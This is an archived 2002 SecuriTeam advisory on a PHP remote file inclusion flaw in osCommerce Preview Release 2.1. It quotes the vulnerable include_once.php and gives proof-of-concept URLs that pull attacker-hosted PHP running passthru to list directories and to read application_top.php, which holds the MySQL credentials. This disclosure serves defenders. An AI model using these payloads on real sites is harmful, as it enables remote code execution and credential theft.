[UNIX] PHP Source Injection in osCommerce
From: support@securiteam.comDate: 06/18/02
- Previous message: support@securiteam.com: "[NT] MetaCart eCommerce Systems Database Exposure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 18 Jun 2002 18:42:33 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
PHP Source Injection in osCommerce
------------------------------------------------------------------------
SUMMARY
<http://www.oscommerce.com> osCommerce is an open source e-commerce
solution under on going development by the open source community. Its
feature packed out-of-the-box installation allows store owners to setup,
run, and maintain their online stores with minimum effort and with no
costs involved. A security vulnerability in the product allows attackers
to cause the program to include 3rd-party PHP code into its existing code
base, thus cause the arbitrary execution of malicious code.
DETAILS
Vulnerable systems:
* osCommerce Preview Release 2.1
osCommerce commes with a file called /catalog/includes/include_once.php
that looks like this:
-------- include_once.php --------
<?
if (!defined($include_file . '__')) {
define($include_file . '__', 1);
include($include_file);
}
?>
----------------------------------
If someone requests a URL like:
http://SERVER/catalog/inludes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, he would be able to include any code he wants
This could be a serious problem because this user could query the SQL
server and get acccess to other important files...
Examples:
1) Directory listing
http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/a.php
--- a.php ---
<? passthru("/bin/ls")?>
-------------
Would result in a directory listing of the current dierctory
2) File viewing
http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/b.php
--- b.php ---
<? passthru("/bin/cat application_top.php")?>
-------------
Would result in showing of the application_top.php file (The file includes
MySQL username, password, etc).
Vendor response:
The vendor has been informed and is currently working on a fix.
ADDITIONAL INFORMATION
The information has been provided by
<mailto:Tim.Vandermeersch@pandora.be> Tim Vandermeerch.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] MetaCart eCommerce Systems Database Exposure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
